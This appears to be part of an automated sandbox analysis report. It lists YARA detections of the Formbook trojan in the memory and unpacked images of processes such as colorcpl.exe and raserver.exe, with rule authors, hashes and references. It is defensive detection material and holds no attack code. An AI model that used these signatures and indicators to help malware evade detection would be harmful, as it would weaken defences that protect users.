          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0321423605241625.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
